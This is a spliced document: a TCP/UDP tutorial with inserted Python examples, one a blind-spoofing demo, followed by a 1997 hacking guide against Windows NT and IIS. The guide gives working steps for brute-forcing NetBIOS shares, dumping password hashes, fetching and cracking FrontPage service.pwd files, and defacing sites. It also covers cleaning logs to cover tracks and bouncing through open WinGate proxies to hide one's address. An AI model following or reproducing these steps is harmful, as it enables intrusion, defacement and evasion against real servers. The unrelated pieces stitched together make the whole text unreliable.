Most Internet applications and services use the Transmission Control Protocol (TCP) to implement the transport layer. TCP provides a reliable, connection-oriented, continuous-stream service. The implications of these characteristics are:

o Reliable: When TCP segments, the units of a TCP transmission, are lost or corrupted, the TCP implementation will detect this and retransmit the necessary segments.

o Connection-oriented: TCP sets up a connection with a remote system by exchanging control information, known as a handshake, before beginning communication. At the end of the connection, a similar closing handshake is performed to end the transmission.
o Continuous-stream: TCP provides a communications medium that allows an arbitrary number of bytes to be sent and received smoothly; once a connection has been established, TCP segments give the application layer the appearance of a continuous flow of data.

Because of these characteristics, it is easy to see why TCP is used by most Internet applications and services. TCP makes it very easy to create a network application, freeing you from worrying about how the data is broken up or about coding error-correction routines. However, TCP requires a significant amount of overhead, and retransmission of lost data may not even be wanted, because the information could have expired by the time it arrives; this makes UDP the popular choice for simpler applications and services.

Below is a chart comparing TCP to both UDP and IP, showing strengths and weaknesses.

                         ┌─────┬─────┬─────┐
                         │ IP  │ UDP │ TCP │
   ┌─────────────────────┼─────┼─────┼─────┤
   │ connection-oriented │ no  │ no  │ yes │
   ├─────────────────────┼─────┼─────┼─────┤
   │ message boundaries  │ yes │ yes │ no  │
   ├─────────────────────┼─────┼─────┼─────┤
   │ data checksum       │ no  │ opt │ yes │
   ├─────────────────────┼─────┼─────┼─────┤
   │ positive ack.       │ no  │ no  │ yes │
   ├─────────────────────┼─────┼─────┼─────┤
   │ timeout and rexmit  │ no  │ no  │ yes │
   ├─────────────────────┼─────┼─────┼─────┤
   │ duplicate detection │ no  │ no  │ yes │
   ├─────────────────────┼─────┼─────┼─────┤
   │ sequencing          │ no  │ no  │ yes │
   ├─────────────────────┼─────┼─────┼─────┤
   │ flow control        │ no  │ no  │ yes │
   └─────────────────────┴─────┴─────┴─────┘

("data checksum: no" for IP means the IP checksum protects only the IP header. The UDP checksum is optional in IPv4; a zero in the field means none was computed.)

An important addressing scheme which TCP defines is the port. Ports are used to separate the various TCP communication streams that are running concurrently on the same system. For server applications, which wait for TCP clients to initiate contact, a specific port is established on which the server listens; the client end is usually given an ephemeral port picked by its operating system, and the pair of address and port at each end identifies the connection. These concepts all come together in a programming abstraction known as sockets.
TCP socket basics will be covered later on. The diagram below shows you how TCP makes a connection. TCP uses something called a three-way handshake. Basically, the server is always running and waits for clients to start the connection. The client sends a SYN (synchronize) segment carrying an initial sequence number x, which should be unpredictable. The server replies with a segment that carries an ACK (acknowledgment) of x+1 together with its own SYN, with a sequence number y of its own choosing. The client then responds with an ACK of y+1. The connection is now established.

   Client                                                  Server

   Generate x        -------- SYN(x) -------->             Receive SYN(x)
                                                           Generate y
   Receive SYN(y)    <--- ACK(x+1)/SYN(y) ----             Send ACK(x+1) and SYN(y)
   and ACK(x+1)
   Send ACK(y+1)     -------- ACK(y+1) ------->            Receive ACK(y+1)

                           Connection Established

The acknowledgment numbers are what tie the three segments together: the server accepts the final ACK only if it acknowledges y+1, so a client that cannot see the server's SYN/ACK can complete the handshake only if it can guess y. That is why the initial sequence numbers must be hard to predict.

-──-───────────────────────────────────────────────────────────────────────────
The TCP/IP Protocols: The User Datagram Protocol (UDP)
-──-───────────────────────────────────────────────────────────────────────────

UDP is a low overhead alternative to TCP for host to host communications. In contrast to TCP, UDP has the following characteristics:

o Unreliable: UDP has no mechanism for retransmitting lost information; its optional checksum can detect a corrupted datagram, but a corrupted datagram is simply dropped.

o Connectionless: UDP does not negotiate a connection before transmitting data. Information is sent with the assumption that the recipient will be listening.

o Message-oriented: UDP allows applications to send self-contained messages within UDP datagrams, the unit of UDP transmission. The application must package all information within individual datagrams.

For some applications, UDP is a more fitting protocol than TCP. For time protocols, lost data indicating the current time would be invalid and outdated by the time it was retransmitted. Another example is NFS: the Network File System can operate more efficiently by providing its own reliability at the application layer, and thus uses UDP.
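The three-way handshake drawn above, as an added example that is not part of the article. Two Endpoint objects exchange the SYN, SYN/ACK and ACK and check the acknowledgment numbers exactly as the diagram shows; the isn parameter lets you swap the random initial sequence number for a predictable one, which is what lets a third party who never sees the SYN/ACK complete the handshake. No real sockets are involved, and the Segment and Endpoint names are this example's own.

```python
"""Model the TCP three-way handshake: SYN / SYN-ACK / ACK with sequence and
acknowledgment number checks on both sides.  Added example, no real sockets."""
import secrets

MOD = 1 << 32                      # sequence numbers are 32-bit and wrap


def seq_add(seq: int, n: int) -> int:
    return (seq + n) % MOD


class Segment:
    """The handful of TCP header fields the handshake cares about."""
    def __init__(self, syn=False, ack=False, seq=0, ack_num=0):
        self.syn, self.ack, self.seq, self.ack_num = syn, ack, seq, ack_num

    def __repr__(self):
        flags = "/".join(f for f, on in (("SYN", self.syn), ("ACK", self.ack)) if on)
        return "%s(seq=%d, ack=%d)" % (flags, self.seq, self.ack_num)


class Endpoint:
    """One side of the connection.  isn() chooses the initial sequence number;
    a predictable chooser is exactly what makes blind spoofing work."""
    def __init__(self, name, isn=lambda: secrets.randbelow(MOD)):
        self.name, self.isn, self.state = name, isn, "CLOSED"
        self.snd_nxt = self.rcv_nxt = None

    # ---- client side ---------------------------------------------------
    def connect(self) -> Segment:
        x = self.isn()                                  # "Generate x"
        self.snd_nxt, self.state = seq_add(x, 1), "SYN_SENT"
        return Segment(syn=True, seq=x)

    def recv_synack(self, seg: Segment) -> Segment:
        if self.state != "SYN_SENT" or not (seg.syn and seg.ack):
            raise ValueError("%s: unexpected segment %r" % (self.name, seg))
        if seg.ack_num != self.snd_nxt:                 # must acknowledge x+1
            raise ValueError("%s: bad ACK %d" % (self.name, seg.ack_num))
        self.rcv_nxt, self.state = seq_add(seg.seq, 1), "ESTABLISHED"
        return Segment(ack=True, seq=self.snd_nxt, ack_num=self.rcv_nxt)

    # ---- server side ---------------------------------------------------
    def listen(self):
        self.state = "LISTEN"

    def recv_syn(self, seg: Segment) -> Segment:
        if self.state != "LISTEN" or not seg.syn or seg.ack:
            raise ValueError("%s: unexpected segment %r" % (self.name, seg))
        y = self.isn()                                  # "Generate y"
        self.rcv_nxt, self.snd_nxt = seq_add(seg.seq, 1), seq_add(y, 1)
        self.state = "SYN_RCVD"
        return Segment(syn=True, ack=True, seq=y, ack_num=self.rcv_nxt)

    def recv_ack(self, seg: Segment) -> bool:
        """Third segment: accepted only if it acknowledges y+1 and carries x+1."""
        if self.state != "SYN_RCVD" or not seg.ack or seg.syn:
            return False
        if seg.ack_num != self.snd_nxt or seg.seq != self.rcv_nxt:
            return False                                # a guess at y that missed
        self.state = "ESTABLISHED"
        return True


def handshake(client: Endpoint, server: Endpoint, trace=None) -> bool:
    """Run the three segments; True when both ends reach ESTABLISHED."""
    server.listen()
    syn = client.connect()
    synack = server.recv_syn(syn)
    ack = client.recv_synack(synack)
    if trace is not None:
        trace.extend([syn, synack, ack])
    return server.recv_ack(ack) and client.state == server.state == "ESTABLISHED"


def blind_spoof(server: Endpoint, guessed_y: int) -> bool:
    """An attacker who never sees the SYN/ACK must guess the server's y.
    Succeeds only when guessed_y equals the y the server actually chose."""
    server.listen()
    server.recv_syn(Segment(syn=True, seq=1000))        # spoofed SYN, fixed seq
    forged = Segment(ack=True, seq=1001, ack_num=seq_add(guessed_y, 1))
    return server.recv_ack(forged)


if __name__ == "__main__":
    trace = []
    print("established:", handshake(Endpoint("client"), Endpoint("server"), trace))
    for seg in trace:
        print("   ", seg)
    print("blind spoof vs random ISN:", blind_spoof(Endpoint("server"), 12345))
    print("blind spoof vs fixed ISN: ", blind_spoof(Endpoint("server", isn=lambda: 12345), 12345))
```

With the default random ISN the blind attempt fails; with isn replaced by a constant it succeeds every time, which is the whole argument for unpredictable initial sequence numbers.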
As with TCP, UDP provides the addressing scheme of ports, allowing many applications to simultaneously send and receive datagrams. UDP ports are distinct from TCP ports. For example, one application can respond on UDP port 512 while another, unrelated service handles TCP port 512. To see which ports are assigned to which protocol and service, look at a copy of /etc/services, available on any UNIX box.

[Windows NT Vulnerability Theories Version 2...........................vacuum]

==========Windows NT Vulnerability Theories Version 2=============
by Vacuum & Chame|eon of Rhino9
[www.rhino9.org is coming]
[http://www.technotronic.com -- vacuum@technotronic.com]
December 04, 1997

Look for an NT Security Suite to be released by Rute soon, based on the theories mentioned in this text.

Special thanks to NeonSurge, creator of rhino9, l0pht for l0phtcrack 1.5, Jeremy Allison for pwdump, Andrew Tridgell for NAT and SAMBA, CyberToast, Darkling, Rute, pSId for coding a Linux version, and Microsoft for creating tools that have nice holes in them. All mentioned programs are available at www.technotronic.com

This r9-nt-v2.zip includes:

vacuum.txt             This text file.
vac1.cap               Network Monitor packet sniffing session in native format. This capture is a FrontPage hack session.
sniff.txt              ASCII version of the capture, which does not require Network Monitor to be read, with the highlights of the vac1.cap session.
service.pwd-scanner.c  Scans for the FrontPage extensions' service.pwd file; for use on Linux based machines.
dnscan                 Lists all servers in a particular domain; its output can be used as the input file for service.pwd-scanner.
datapipe.c             datapipe is similar to bounce.c:
                           gcc -o datapipe datapipe.c
                           chmod 755 datapipe
                           ./datapipe 2222 23 www.target.com
                       where 2222 is the local port datapipe listens on and 23 is the destination port; for the FrontPage attack the destination port would be 80.

If any programmers want to go HARDCORE with me, I have set up the appropriate symbol files as well as the capability of running a "remote" debug through the modem to share my ideas/theories.

==========NetBIOS Attack Program==================================

Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

OPTIONS
   -o         Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
   -u         Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file.
   -p         Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file.
   <address>  Addresses should be specified in comma delimited format, with no spaces. Valid address specifications include:
                 hostname                 "hostname" is added
                 127.0.0.1-127.0.0.3      adds addresses 127.0.0.1 through 127.0.0.3
                 127.0.0.1-3              adds addresses 127.0.0.1 through 127.0.0.3
                 127.0.0.1-3,7,10-20      adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20
                 hostname,127.0.0.1-3     adds "hostname" and 127.0.0.1 through 127.0.0.3
              All combinations of hostnames and address ranges as specified above are valid.

Note that NAT.EXE will scan the whole IP range for NetBIOS shares, as specified above.
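What NAT's share enumeration looks like on the wire is shown in the Sniffing section further down: frame 19, the NetrShareEnum request, complete with its hex dump. As an added example, not part of this text or of NAT, here is a decoder that takes that hex dump and walks back up the stack (Ethernet, IP, TCP, NetBIOS session, SMB transaction, DCE/RPC), recovering the same fields Network Monitor prints, verifying the IP checksum 0x415E, and naming the srvsvc operation from its opnum. The dump string is copied from the capture; the header layouts are the standard ones, and the opnum table holds only the two operations the capture mentions.

```python
"""Decode frame 19 from the Sniffing section (NAT's NetrShareEnum request) by
stripping one header per layer: Ethernet -> IP -> TCP -> NetBIOS session ->
SMB transaction -> DCE/RPC.  Added example; the dump is copied from the capture."""
import struct
from itertools import takewhile

FRAME19_DUMP = r"""
00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49 ....@...A^.I...I
00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18 ...(...`".....P.
00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00 V@........SMB%.
00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00 .....|.......`..
00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54 ...............T
00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00 .`.T...&...q..\.
00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00 P.I.P.E.\....-..
00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00 ......`.......H.
000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00 ......6.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00 ................
000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 ..............
"""

SRVSVC_OPNUMS = {15: "NetrShareEnum", 21: "NetrServerGetInfo"}   # the two ops in this capture


def _is_hex_byte(tok: str) -> bool:
    return len(tok) == 2 and all(c in "0123456789abcdefABCDEF" for c in tok)


def parse_hexdump(dump: str) -> bytes:
    """'OFFSET: xx xx ... ascii' -> raw bytes; stops at the first non-hex token (the ASCII column)."""
    out = bytearray()
    for line in dump.strip().splitlines():
        tokens = line.split(":", 1)[1].split()
        out += bytes(int(t, 16) for t in takewhile(_is_hex_byte, tokens))
    return bytes(out)


def checksum16(data: bytes) -> int:
    """RFC 1071 one's-complement sum; a valid IPv4 header, checksum included, sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def decode_frame(frame: bytes) -> dict:
    """Strip one header per layer and return the fields Network Monitor shows for each."""
    d = {}
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])                 # Ethernet (big-endian)
    d["eth"] = {"dst": dst.hex(), "src": src.hex(), "type": etype}
    if etype != 0x0800:
        raise ValueError("not IPv4")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    _, _, total_len, ident, _, ttl, proto, csum, saddr, daddr = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    d["ip"] = {"len": total_len, "id": ident, "ttl": ttl, "proto": proto, "csum": csum,
               "csum_ok": checksum16(ip[:ihl]) == 0,
               "src": ".".join(map(str, saddr)), "dst": ".".join(map(str, daddr))}
    if proto != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:total_len]                                                 # IP total length bounds the segment
    sport, dport, seq, ack, off_flags, win = struct.unpack("!HHIIHH", tcp[:16])
    doff = (off_flags >> 12) * 4
    d["tcp"] = {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
                "flags": off_flags & 0x1FF, "win": win, "payload_len": len(tcp) - doff}
    payload = tcp[doff:]
    if dport != 139:
        return d
    nbt_type, nbt_flags, nbt_len = struct.unpack("!BBH", payload[:4])       # NetBIOS session header
    d["nbt"] = {"type": nbt_type, "len": nbt_len + ((nbt_flags & 1) << 16)}
    smb = payload[4:4 + d["nbt"]["len"]]
    if smb[:4] != b"\xffSMB":
        return d
    # SMB header is little-endian: cmd, status, flags, flags2, PIDHigh, signature, reserved, TID, PID, UID, MID
    cmd, _, flags, flags2, _, _, _, tid, pid, uid, mid = struct.unpack("<BIBHH8sHHHHH", smb[4:32])
    d["smb"] = {"cmd": cmd, "flags": flags, "flags2": flags2, "tid": tid, "pid": pid,
                "uid": uid, "mid": mid, "word_count": smb[32]}
    if cmd != 0x25:                                                         # SMB_COM_TRANSACTION
        return d
    data_off = struct.unpack_from("<H", smb, 33 + 2 * 12)[0]                # parameter word 12: DataOffset
    d["smb"]["fid"] = struct.unpack_from("<H", smb, 33 + 2 * 15)[0]         # setup word 1: the pipe's FID
    rpc = smb[data_off:]                                                    # DCE/RPC PDU carried in the pipe
    ver, _, ptype, _, drep, frag_len, _, call_id, _, _, opnum = struct.unpack("<BBBB4sHHIIHH", rpc[:24])
    if not drep[0] & 0x10:
        raise ValueError("big-endian NDR not handled")
    d["rpc"] = {"ver": ver, "ptype": ptype, "frag_len": frag_len, "call_id": call_id,
                "opnum": opnum, "op": SRVSVC_OPNUMS.get(opnum, "opnum %d" % opnum)}
    return d


if __name__ == "__main__":
    for layer, fields in decode_frame(parse_hexdump(FRAME19_DUMP)).items():
        print("%-4s %s" % (layer, fields))
```

The decoded request is a DCE/RPC call with opnum 15 over the srvsvc pipe on TCP/139, which is what a sniffer or an IDS should flag as share enumeration; the same parse of the server's reply (frame 27) would give you the share list the attacker received.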
Comparing NAT.EXE to Microsoft's own executables:

C:\>nbtstat -A 204.73.131.11

       NetBIOS Remote Machine Name Table

   Name                Type         Status
   ---------------------------------------------
   STUDENT1       <20>  UNIQUE      Registered
   STUDENT1       <00>  UNIQUE      Registered
   DOMAIN1        <00>  GROUP       Registered
   DOMAIN1        <1C>  GROUP       Registered
   DOMAIN1        <1B>  UNIQUE      Registered
   STUDENT1       <03>  UNIQUE      Registered
   DOMAIN1        <1E>  GROUP       Registered
   DOMAIN1        <1D>  UNIQUE      Registered
   ..__MSBROWSE__.<01>  GROUP       Registered

   MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial listing of NetBIOS name suffixes (the 16th byte of the name):

   Computername   <00>  UNIQUE  Workstation service name
   Domainname     <00>  GROUP   Domain name
   Server         <20>  UNIQUE  Server service name
   Computername   <03>  UNIQUE  Registered by the messenger service. This is the computername to be added to the LMHOSTS file, which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
   Username       <03>          Registered by the messenger service
   Domainname     <1B>          Registers the local computer as the domain master browser for the domain
   Domainname     <1C>          Registers the computer as a domain controller for the domain (PDC or BDC)
   Domainname     <1D>          Registers the local client as the local segment's master browser for the domain
   Domainname     <1E>          Registers as a group NetBIOS name (browser elections)
   <BF>  Network Monitor Name
   <BE>  Network Monitor Agent
   <06>  RAS Server
   <1F>  Net DDE
   <21>  RAS Client

So the nbtstat output above already tells you, without any credentials, that 204.73.131.11 is a domain controller (<1C>) and the domain master browser (<1B>) for DOMAIN1.

C:\>net view 204.73.131.11
Shared resources at 204.73.131.11

Share name   Type   Used as   Comment
------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

C:\>net use /?
The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

C:\>net use x: \\204.73.131.11\test
The command completed successfully.

C:\unzipped\nat10bin>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           X:        \\204.73.131.11\test      Microsoft Windows Network
OK                     \\204.73.131.11\test      Microsoft Windows Network
The command completed successfully.

C:\>nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk:     Remote Admin
        C$             Disk:     Default share
        IPC$           IPC:      Remote IPC
        NETLOGON       Disk:     Logon server share
        Test           Disk:
[*]--- This machine has a browse list:
        Server               Comment
        ---------            -------
        STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default shares are still at Everyone/Full Control, that is it: the machine is hacked. Note that everything above followed from one guessed password (ADMINISTRATOR / password); with write access to ADMIN$ and C$ the whole disk is open.

==========Frontpage Extension Scanner & Cracker========================

C:\>pwdump 204.73.131.11

NOTE: This is the pwdump output from the webserver; the LAN Manager password is set to "password".
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::

The fields are username, RID, LM hash, NT hash and comment. The two hashes on the Administrator line are the LM and NT hashes of "password" (see the note above), and the Guest account has no password at all.

The #haccess.ctl file:

# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

Executing fpservwin.exe allows the FrontPage server extensions to be installed on port 443 (HTTPS, Secure Sockets Layer) or port 80 (HTTP).

NOTE the Limit line: telnetting to port 80 or 443 and issuing GET, POST and PUT by hand can be used instead of FrontPage.
The following is a list of the Internet Information Server file locations on the local hard drive (C:) and on the web (www.target.com):

C:\InetPub\wwwroot                                    <Home>
C:\InetPub\scripts                                    /Scripts
C:\InetPub\wwwroot\_vti_bin                           /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm                  /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut                  /_vti_bin/_vti_aut
C:\InetPub\cgi-bin                                    /cgi-bin
C:\InetPub\wwwroot\srchadm                            /srchadm
C:\WINNT\System32\inetserv\iisadmin                   /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM        Index Server sample (only present if Index Server is running under Internet Information Server)
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm

service.pwd is our goal, although lots of servers are not password protected at all and can be exploited easily. queryhit.htm, if found, can be used to get service.pwd: search for "#filename=*.pwd".

FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files that the access file points to:

service.pwd   contains the list of users and passwords for the FrontPage web.
service.grp   contains the list of groups (one group for authors and one for administrators in FrontPage).

On Netscape servers there are no service.grp files. The Netscape password files are:

administrators.pwd   for administrators
authors.pwd          for authors and administrators
users.pwd            for users, authors, and administrators

NOTE: Name and password are case sensitive.

Scanning port 80 or 443, the requests to try:

GET /_vti_inf.html                  # Ensures that the FrontPage server extensions are installed.
GET /_vti_pvt/service.pwd           # Contains the encrypted passwords. Not used on IIS and WebSite servers.
GET /_vti_pvt/authors.pwd           # On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log            # If author.log is there it will need to be cleaned to cover your tracks.
GET /samples/search/queryhit.htm

If service.pwd is obtained it will look similar to this:

Vacuum:SGXJVl6OJ9zkE

The above password is apple. The hash is a traditional UNIX crypt(3) DES hash, so turn the line into passwd format:

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

and save it as service.txt. Then run your favorite UNIX password cracker, like John the Ripper:

C:\>john -w:dictionary.txt service.txt

Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
Flags: -pwfile:<file>[,..]      specify passwd file(s) (wildcards allowed)
       -wordfile:<file>         specify wordlist file
       -restore[:<file>]        restore session [from <file>]
       -user:login|uid[,..]     only crack this (these) user(s)
       -timeout:<time>          abort session after a period of <time> minutes
       -incremental[:<mode>]    incremental mode [using JOHN.INI entry <mode>]
       -single                  single crack mode
       -stdin                   read words from stdin
       -list                    list each word
       -test                    perform a benchmark
       -beep                    beep when a password is found
       -quiet                   do not beep when a password is found (default)
       -noname                  don't use memory for login names

Other ways of obtaining service.pwd:

http://ftpsearch.com/index.html            search for service.pwd
http://www.alstavista.digital.com          advanced search for link:"/_vti_pvt/service.pwd"

To open a FrontPage web:

1. On the FrontPage Explorer's File menu, choose Open FrontPage Web.
2. In the Getting Started dialog box, select Open an Existing FrontPage Web and choose the FrontPage web you want to open. Click More Webs if the web you want to open is not listed.
3. Click OK.
4. If you are prompted for your author name and password, you will have to decrypt service.pwd, guess, or move on. Enter them in the Name and Password Required dialog box, and click OK.
5. Alter the existing page, or upload a page of your own.

I have captured the entire hack from connection, to password authentication, to the actual page upload.
To view this file, you will need to use Windows NT's Network Monitor and open the file vac.cap.

=====Wingate Scanner =======================================================

step 1. Use WS_Ping Pro or Domscan to scan an IP address range looking for xxx.xxx.xxx.xxx port 23 or port 1080. 1080 is the SOCKS port for WinGate; 23 is of course the telnet port.

step 2. telnet to port 23 on found targets to see if you get a prompt like this:

   Wingate>

To bounce on to another server:

   Wingate>www.target.com 23

or whatever port you want to connect to. (This would be a good way to mask your original IP address when setting up bounce.c on a UNIX shell.)

=====Sniffing ==============================================================

Running a packet sniffer to see the actual determining of shares:

NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..)
This frame is a NetShareEnum request, which requests a list of shared resources.

19  31.348  STUDENT7  *SMBSERVER  R_SRVSVC  RPC Client call srvsvc:NetrShareEnum(..)  STUDENT7  *SMBSERVER  IP

FRAME: Base frame properties
    FRAME: Time of capture = Dec 3, 1997 9:12:54.18
    FRAME: Time delta from previous physical frame: 0 milliseconds
    FRAME: Frame number: 19
    FRAME: Total frame length: 238 bytes
    FRAME: Capture frame length: 238 bytes
    FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
    ETHERNET: Destination address : 00C04FC48C9D
        ETHERNET: .......0 = Individual address
        ETHERNET: ......0. = Universally administered address
    ETHERNET: Source address : 00C04FC48C93
        ETHERNET: .......0 = No routing information present
        ETHERNET: ......0. = Universally administered address
    ETHERNET: Frame Length : 238 (0x00EE)
    ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
    ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0)
IP: ID = 0x1A08; Proto = TCP; Len: 224
    IP: Version = 4 (0x4)
    IP: Header Length = 20 (0x14)
    IP: Service Type = 0 (0x0)
        IP: Precedence = Routine
        IP: ...0.... = Normal Delay
        IP: ....0... = Normal Throughput
        IP: .....0.. = Normal Reliability
    IP: Total Length = 224 (0xE0)
    IP: Identification = 6664 (0x1A08)
    IP: Flags Summary = 2 (0x2)
        IP: .......0 = Last fragment in datagram
        IP: ......1. = Cannot fragment datagram
    IP: Fragment Offset = 0 (0x0) bytes
    IP: Time to Live = 128 (0x80)
    IP: Protocol = TCP - Transmission Control
    IP: Checksum = 0x415E
    IP: Source Address = 204.73.131.19
    IP: Destination Address = 204.73.131.11
    IP: Data: Number of data bytes remaining = 204 (0x00CC)
TCP: .AP..., len: 184, seq: 73409249-73409432, ack: 1505236, win: 8278, src: 1832 dst: 139 (NBT Session)
    TCP: Source Port = 0x0728
    TCP: Destination Port = NETBIOS Session Service
    TCP: Sequence Number = 73409249 (0x46022E1)
    TCP: Acknowledgement Number = 1505236 (0x16F7D4)
    TCP: Data Offset = 20 (0x14)
    TCP: Reserved = 0 (0x0000)
    TCP: Flags = 0x18 : .AP...
        TCP: ..0..... = No urgent data
        TCP: ...1.... = Acknowledgement field significant
        TCP: ....1... = Push function
        TCP: .....0.. = No Reset
        TCP: ......0. = No Synchronize
        TCP: .......0 = No Fin
    TCP: Window = 8278 (0x2056)
    TCP: Checksum = 0x40ED
    TCP: Urgent Pointer = 0 (0x0)
    TCP: Data: Number of data bytes remaining = 184 (0x00B8)
NBT: SS: Session Message, Len: 180
    NBT: Packet Type = Session Message
    NBT: Packet Flags = 0 (0x0)
        NBT: .......0 = Add 0 to Length
    NBT: Packet Length = 180 (0xB4)
    NBT: SS Data: Number of data bytes remaining = 180 (0x00B4)
